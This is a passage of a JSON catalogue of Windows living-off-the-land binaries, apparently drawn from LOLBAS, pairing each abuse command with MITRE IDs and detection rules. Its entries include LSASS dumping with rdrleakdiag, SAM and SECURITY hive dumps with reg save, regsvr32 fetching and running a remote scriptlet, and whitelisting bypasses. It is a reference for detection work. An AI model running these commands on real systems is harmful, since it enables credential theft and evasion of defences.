subkeys"}],"references":["https://twitter.com/0gtweet/status/1674399582162153472","https://lolbas-project.github.io/lolbas/Binaries/Provlaunch/"]},{"id":"lolbas:psr-exe:0","toolId":"lolbas:psr-exe","toolName":"Psr.exe","name":"Reconnaissance","source":"LOLBAS","platform":["Windows"],"capability":["Discovery"],"nativeCategory":["Reconnaissance"],"command":"psr.exe /start /output {PATH_ABSOLUTE:.zip} /sc 1 /gui 0","description":"Record a user screen without creating a GUI. You should use \"psr.exe /stop\" to stop recording and create output file.","usecase":"Can be used to take screenshots of the user environment","mitre":["T1113"],"privilege":"user","fullPath":["c:\\windows\\system32\\psr.exe","c:\\windows\\syswow64\\psr.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_psr_capture_screenshots.yml"},{"type":"IOC","value":"psr.exe spawned"},{"type":"IOC","value":"suspicious activity when running with \"/gui 0\" flag"}],"references":["https://social.technet.microsoft.com/wiki/contents/articles/51722.windows-problem-steps-recorder-psr-quick-and-easy-documenting-of-your-steps-and-procedures.aspx","https://lolbas-project.github.io/lolbas/Binaries/Psr/"]},{"id":"lolbas:query-exe:0","toolId":"lolbas:query-exe","toolName":"Query.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"query.exe user","description":"Once executed, `query.exe` will execute `quser.exe` in the same folder. Thus, if `query.exe` is copied to a folder and an arbitrary executable is renamed to `quser.exe`, `query.exe` will spawn it. Instead of `user`, it is also possible to use `session`, `termsession` or `process` as command-line option.","usecase":"Execute an arbitrary executable via trusted system executable.","mitre":["T1218"],"privilege":"user","fullPath":["c:\\windows\\system32\\query.exe","c:\\windows\\syswow64\\query.exe"],"toolType":"Binary","detection":[{"type":"IOC","value":"query.exe being executed and executes a child process outside of its normal path of c:\\windows\\system32\\ or c:\\windows\\syswow64\\"}],"references":["https://lolbas-project.github.io/lolbas/Binaries/Query/"]},{"id":"lolbas:rasautou-exe:0","toolId":"lolbas:rasautou-exe","toolName":"Rasautou.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"rasautou -d {PATH:.dll} -p export_name -a a -e e","description":"Loads the target .DLL specified in -d and executes the export specified in -p. Options removed in Windows 10.","usecase":"Execute DLL code","mitre":["T1218"],"privilege":"admin","fullPath":["C:\\Windows\\System32\\rasautou.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_rasautou_dll_execution.yml"},{"type":"IOC","value":"rasautou.exe command line containing -d and -p"}],"references":["https://github.com/fireeye/DueDLLigence","https://www.fireeye.com/blog/threat-research/2019/10/staying-hidden-on-the-endpoint-evading-detection-with-shellcode.html","https://lolbas-project.github.io/lolbas/Binaries/Rasautou/"]},{"id":"lolbas:rdrleakdiag-exe:0","toolId":"lolbas:rdrleakdiag-exe","toolName":"rdrleakdiag.exe","name":"Dump","source":"LOLBAS","platform":["Windows"],"capability":["Credential Access"],"nativeCategory":["Dump"],"command":"rdrleakdiag.exe /p 940 /o {PATH_ABSOLUTE:folder} /fullmemdmp /wait 1","description":"Dump process by PID and create a dump file (creates files called `minidump_<PID>.dmp` and `results_<PID>.hlk`).","usecase":"Dump process by PID.","mitre":["T1003"],"privilege":"user","fullPath":["c:\\windows\\system32\\rdrleakdiag.exe","c:\\Windows\\SysWOW64\\rdrleakdiag.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_rdrleakdiag_process_dumping.yml"},{"type":"Elastic","value":"https://www.elastic.co/guide/en/security/current/potential-credential-access-via-windows-utilities.html"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/5bdf70e72c6cd4547624c521108189af994af449/rules/windows/credential_access_cmdline_dump_tool.toml"}],"references":["https://twitter.com/0gtweet/status/1299071304805560321?s=21","https://www.pureid.io/dumping-abusing-windows-credentials-part-1/","https://github.com/LOLBAS-Project/LOLBAS/issues/84","https://lolbas-project.github.io/lolbas/Binaries/rdrleakdiag/"]},{"id":"lolbas:rdrleakdiag-exe:1","toolId":"lolbas:rdrleakdiag-exe","toolName":"rdrleakdiag.exe","name":"Dump","source":"LOLBAS","platform":["Windows"],"capability":["Credential Access"],"nativeCategory":["Dump"],"command":"rdrleakdiag.exe /p 832 /o {PATH_ABSOLUTE:folder} /fullmemdmp /wait 1","description":"Dump LSASS process by PID and create a dump file (creates files called `minidump_<PID>.dmp` and `results_<PID>.hlk`).","usecase":"Dump LSASS process.","mitre":["T1003.001"],"privilege":"admin","fullPath":["c:\\windows\\system32\\rdrleakdiag.exe","c:\\Windows\\SysWOW64\\rdrleakdiag.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_rdrleakdiag_process_dumping.yml"},{"type":"Elastic","value":"https://www.elastic.co/guide/en/security/current/potential-credential-access-via-windows-utilities.html"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/5bdf70e72c6cd4547624c521108189af994af449/rules/windows/credential_access_cmdline_dump_tool.toml"}],"references":["https://twitter.com/0gtweet/status/1299071304805560321?s=21","https://www.pureid.io/dumping-abusing-windows-credentials-part-1/","https://github.com/LOLBAS-Project/LOLBAS/issues/84","https://lolbas-project.github.io/lolbas/Binaries/rdrleakdiag/"]},{"id":"lolbas:rdrleakdiag-exe:2","toolId":"lolbas:rdrleakdiag-exe","toolName":"rdrleakdiag.exe","name":"Dump","source":"LOLBAS","platform":["Windows"],"capability":["Credential Access"],"nativeCategory":["Dump"],"command":"rdrleakdiag.exe /p 832 /o {PATH_ABSOLUTE:folder} /fullmemdmp /snap","description":"After dumping a process using `/wait 1`, subsequent dumps must use `/snap` (creates files called `minidump_<PID>.dmp` and `results_<PID>.hlk`).","usecase":"Dump LSASS process mutliple times.","mitre":["T1003.001"],"privilege":"admin","fullPath":["c:\\windows\\system32\\rdrleakdiag.exe","c:\\Windows\\SysWOW64\\rdrleakdiag.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_rdrleakdiag_process_dumping.yml"},{"type":"Elastic","value":"https://www.elastic.co/guide/en/security/current/potential-credential-access-via-windows-utilities.html"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/5bdf70e72c6cd4547624c521108189af994af449/rules/windows/credential_access_cmdline_dump_tool.toml"}],"references":["https://twitter.com/0gtweet/status/1299071304805560321?s=21","https://www.pureid.io/dumping-abusing-windows-credentials-part-1/","https://github.com/LOLBAS-Project/LOLBAS/issues/84","https://lolbas-project.github.io/lolbas/Binaries/rdrleakdiag/"]},{"id":"lolbas:reg-exe:0","toolId":"lolbas:reg-exe","toolName":"Reg.exe","name":"ADS","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion","File Write"],"nativeCategory":["ADS"],"command":"reg export HKLM\\SOFTWARE\\Microsoft\\Evilreg {PATH_ABSOLUTE}:evilreg.reg","description":"Export the target Registry key and save it to the specified .REG file within an Alternate data stream.","usecase":"Hide/plant registry information in Alternate data stream for later use","mitre":["T1564.004"],"privilege":"user","fullPath":["C:\\Windows\\System32\\reg.exe","C:\\Windows\\SysWOW64\\reg.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_regedit_import_keys_ads.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_regedit_import_keys.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_reg_dumping_sensitive_hives.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/attempted_credential_dump_from_registry_via_reg_exe.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/f6421d8c534f295518a2c945f530e8afc4c8ad1b/rules/windows/credential_access_dump_registry_hives.toml"},{"type":"IOC","value":"reg.exe writing to an ADS"}],"references":["https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f","https://pure.security/dumping-windows-credentials/","https://lolbas-project.github.io/lolbas/Binaries/Reg/"]},{"id":"lolbas:reg-exe:1","toolId":"lolbas:reg-exe","toolName":"Reg.exe","name":"Credentials","source":"LOLBAS","platform":["Windows"],"capability":["Credential Access"],"nativeCategory":["Credentials"],"command":"reg save HKLM\\SECURITY {PATH_ABSOLUTE:.1.bak} && reg save HKLM\\SYSTEM {PATH_ABSOLUTE:.2.bak} && reg save HKLM\\SAM {PATH_ABSOLUTE:.3.bak}","description":"Dump registry hives (SAM, SYSTEM, SECURITY) to retrieve password hashes and key material","usecase":"Dump credentials from the Security Account Manager (SAM)","mitre":["T1003.002"],"privilege":"admin","fullPath":["C:\\Windows\\System32\\reg.exe","C:\\Windows\\SysWOW64\\reg.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_regedit_import_keys_ads.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_regedit_import_keys.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_reg_dumping_sensitive_hives.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/attempted_credential_dump_from_registry_via_reg_exe.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/f6421d8c534f295518a2c945f530e8afc4c8ad1b/rules/windows/credential_access_dump_registry_hives.toml"},{"type":"IOC","value":"reg.exe writing to an ADS"}],"references":["https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f","https://pure.security/dumping-windows-credentials/","https://lolbas-project.github.io/lolbas/Binaries/Reg/"]},{"id":"lolbas:regasm-exe:0","toolId":"lolbas:regasm-exe","toolName":"Regasm.exe","name":"AWL Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL Bypass"],"command":"regasm.exe {PATH:.dll}","description":"Loads the target .NET DLL file and executes the RegisterClass function.","usecase":"Execute code and bypass Application whitelisting","mitre":["T1218.009"],"privilege":"admin","fullPath":["C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\regasm.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\regasm.exe","C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\regasm.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_regasm.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/execution_register_server_program_connecting_to_the_internet.toml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/bc93e670f5dcb24e96fbe3664d6bcad92df5acad/docs/_stories/suspicious_regsvcs_regasm_activity.md"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/detect_regasm_with_network_connection.yml"},{"type":"IOC","value":"regasm.exe executing dll file"}],"references":["https://pentestlab.blog/2017/05/19/applocker-bypass-regasm-and-regsvcs/","https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/","https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md","https://lolbas-project.github.io/lolbas/Binaries/Regasm/"]},{"id":"lolbas:regasm-exe:1","toolId":"lolbas:regasm-exe","toolName":"Regasm.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"regasm.exe /U {PATH:.dll}","description":"Loads the target .DLL file and executes the UnRegisterClass function.","usecase":"Execute code and bypass Application whitelisting","mitre":["T1218.009"],"privilege":"user","fullPath":["C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\regasm.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\regasm.exe","C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\regasm.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_regasm.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/execution_register_server_program_connecting_to_the_internet.toml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/bc93e670f5dcb24e96fbe3664d6bcad92df5acad/docs/_stories/suspicious_regsvcs_regasm_activity.md"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/detect_regasm_with_network_connection.yml"},{"type":"IOC","value":"regasm.exe executing dll file"}],"references":["https://pentestlab.blog/2017/05/19/applocker-bypass-regasm-and-regsvcs/","https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/","https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md","https://lolbas-project.github.io/lolbas/Binaries/Regasm/"]},{"id":"lolbas:regedit-exe:0","toolId":"lolbas:regedit-exe","toolName":"Regedit.exe","name":"ADS","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion","File Write"],"nativeCategory":["ADS"],"command":"regedit /E {PATH_ABSOLUTE}:regfile.reg HKEY_CURRENT_USER\\MyCustomRegKey","description":"Export the target Registry key to the specified .REG file.","usecase":"Hide registry data in alternate data stream","mitre":["T1564.004"],"privilege":"user","fullPath":["C:\\Windows\\regedit.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_regedit_import_keys_ads.yml"},{"type":"IOC","value":"regedit.exe reading and writing to alternate data stream"},{"type":"IOC","value":"regedit.exe should normally not be executed by end-users"}],"references":["https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f","https://lolbas-project.github.io/lolbas/Binaries/Regedit/"]},{"id":"lolbas:regedit-exe:1","toolId":"lolbas:regedit-exe","toolName":"Regedit.exe","name":"ADS","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion","File Write"],"nativeCategory":["ADS"],"command":"regedit {PATH_ABSOLUTE}:regfile.reg","description":"Import the target .REG file into the Registry.","usecase":"Import hidden registry data from alternate data stream","mitre":["T1564.004"],"privilege":"user","fullPath":["C:\\Windows\\regedit.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_regedit_import_keys_ads.yml"},{"type":"IOC","value":"regedit.exe reading and writing to alternate data stream"},{"type":"IOC","value":"regedit.exe should normally not be executed by end-users"}],"references":["https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f","https://lolbas-project.github.io/lolbas/Binaries/Regedit/"]},{"id":"lolbas:regini-exe:0","toolId":"lolbas:regini-exe","toolName":"Regini.exe","name":"ADS","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion","File Write"],"nativeCategory":["ADS"],"command":"regini.exe {PATH}:hidden.ini","description":"Write registry keys from data inside the Alternate data stream.","usecase":"Write to registry","mitre":["T1564.004"],"privilege":"user","fullPath":["C:\\Windows\\System32\\regini.exe","C:\\Windows\\SysWOW64\\regini.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_regini_ads.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_regini_execution.yml"},{"type":"IOC","value":"regini.exe reading from ADS"}],"references":["https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f","https://lolbas-project.github.io/lolbas/Binaries/Regini/"]},{"id":"lolbas:register-cimprovider-exe:0","toolId":"lolbas:register-cimprovider-exe","toolName":"Register-cimprovider.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"Register-cimprovider -path {PATH_ABSOLUTE:.dll}","description":"Load the target .DLL.","usecase":"Execute code within dll file","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Windows\\System32\\Register-cimprovider.exe","C:\\Windows\\SysWOW64\\Register-cimprovider.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/35a7244c62820fbc5a832e50b1e224ac3a1935da/rules/windows/process_creation/proc_creation_win_susp_register_cimprovider.yml"},{"type":"IOC","value":"Register-cimprovider.exe execution and cmdline DLL load may be supsicious"}],"references":["https://twitter.com/PhilipTsukerman/status/992021361106268161","https://lolbas-project.github.io/lolbas/Binaries/Register-cimprovider/"]},{"id":"lolbas:regsvcs-exe:0","toolId":"lolbas:regsvcs-exe","toolName":"Regsvcs.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"regsvcs.exe {PATH:.dll}","description":"Loads the target .NET DLL file and executes the RegisterClass function.","usecase":"Execute dll file and bypass Application whitelisting","mitre":["T1218.009"],"privilege":"user","fullPath":["C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\RegSvcs.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\RegSvcs.exe","C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\RegSvcs.exe","C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_regasm.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/execution_register_server_program_connecting_to_the_internet.toml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/detect_regsvcs_with_network_connection.yml"}],"references":["https://pentestlab.blog/2017/05/19/applocker-bypass-regasm-and-regsvcs/","https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/","https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md","https://lolbas-project.github.io/lolbas/Binaries/Regsvcs/"]},{"id":"lolbas:regsvcs-exe:1","toolId":"lolbas:regsvcs-exe","toolName":"Regsvcs.exe","name":"AWL Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL Bypass"],"command":"regsvcs.exe {PATH:.dll}","description":"Loads the target .NET DLL file and executes the RegisterClass function.","usecase":"Execute dll file and bypass Application whitelisting","mitre":["T1218.009"],"privilege":"admin","fullPath":["C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\RegSvcs.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\RegSvcs.exe","C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\RegSvcs.exe","C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_regasm.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/execution_register_server_program_connecting_to_the_internet.toml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/detect_regsvcs_with_network_connection.yml"}],"references":["https://pentestlab.blog/2017/05/19/applocker-bypass-regasm-and-regsvcs/","https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/","https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md","https://lolbas-project.github.io/lolbas/Binaries/Regsvcs/"]},{"id":"lolbas:regsvr32-exe:0","toolId":"lolbas:regsvr32-exe","toolName":"Regsvr32.exe","name":"AWL Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL Bypass"],"command":"regsvr32 /s /n /u /i:{REMOTEURL:.sct} scrobj.dll","description":"Execute the specified remote .SCT script with scrobj.dll.","usecase":"Execute code from remote scriptlet, bypass Application whitelisting","mitre":["T1218.010"],"privilege":"user","fullPath":["C:\\Windows\\System32\\regsvr32.exe","C:\\Windows\\SysWOW64\\regsvr32.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_regsvr32_susp_parent.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_regsvr32_susp_child_process.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_regsvr32_susp_exec_path_1.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_regsvr32_network_pattern.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/network_connection/net_connection_win_regsvr32_network_activity.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/dns_query/dns_query_win_regsvr32_network_activity.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_regsvr32_flags_anomaly.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/file/file_event/file_event_win_net_cli_artefact.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/detect_regsvr32_application_control_bypass.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/execution_register_server_program_connecting_to_the_internet.toml"},{"type":"IOC","value":"regsvr32.exe retrieving files from Internet"},{"type":"IOC","value":"regsvr32.exe executing scriptlet (sct) files"},{"type":"IOC","value":"DotNet CLR libraries loaded into regsvr32.exe"},{"type":"IOC","value":"DotNet CLR Usage Log - regsvr32.exe.log"}],"references":["https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/","https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/","https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md","https://lolbas-project.github.io/lolbas/Binaries/Regsvr32/"]},{"id":"lolbas:regsvr32-exe:1","toolId":"lolbas:regsvr32-exe","toolName":"Regsvr32.exe","name":"AWL Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL Bypass"],"command":"regsvr32.exe /s /u /i:{PATH:.sct} scrobj.dll","description":"Execute the specified local .SCT script with scrobj.dll.","usecase":"Execute code from scriptlet, bypass Application whitelisting","mitre":["T1218.010"],"privilege":"user","fullPath":["C:\\Windows\\System32\\regsvr32.exe","C:\\Windows\\SysWOW64\\regsvr32.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_regsvr32_susp_parent.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_regsvr32_susp_child_process.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_regsvr32_susp_exec_path_1.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_regsvr32_network_pattern.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/network_connection/net_connection_win_regsvr32_network_activity.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/dns_query/dns_query_win_regsvr32_network_activity.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_regsvr32_flags_anomaly.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/file/file_event/file_event_win_net_cli_artefact.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/detect_regsvr32_application_control_bypass.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/execution_register_server_program_connecting_to_the_internet.toml"},{"type":"IOC","value":"regsvr32.exe retrieving files from Internet"},{"type":"IOC","value":"regsvr32.exe executing scriptlet (sct) files"},{"type":"IOC","value":"DotNet CLR libraries loaded into regsvr32.exe"},{"type":"IOC","value":"DotNet CLR Usage Log - regsvr32.exe.log"}],"references":["https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/","https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/","https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md","https://lolbas-project.github.io/lolbas/Binaries/Regsvr32/"]},{"id":"lolbas:regsvr32-exe:2","toolId":"lolbas:regsvr32-exe","toolName":"Regsvr32.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"regsvr32 /s /n /u /i:{REMOTEURL:.sct} scrobj.dll","description":"Execute the specified remote .SCT script with scrobj.dll.","usecase":"Execute code from remote scriptlet, bypass Application whitelisting","mitre":["T1218.010"],"privilege":"user","fullPath":["C:\\Windows\\System32\\regsvr32.exe","C:\\Windows\\SysWOW64\\regsvr32.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_regsvr32_susp_parent.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_regsvr32_susp_child_process.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_regsvr32_susp_exec_path_1.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_regsvr32_network_pattern.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/network_connection/net_connection_win_regsvr32_network_activity.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/dns_query/dns_query_win_regsvr32_network_activity.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c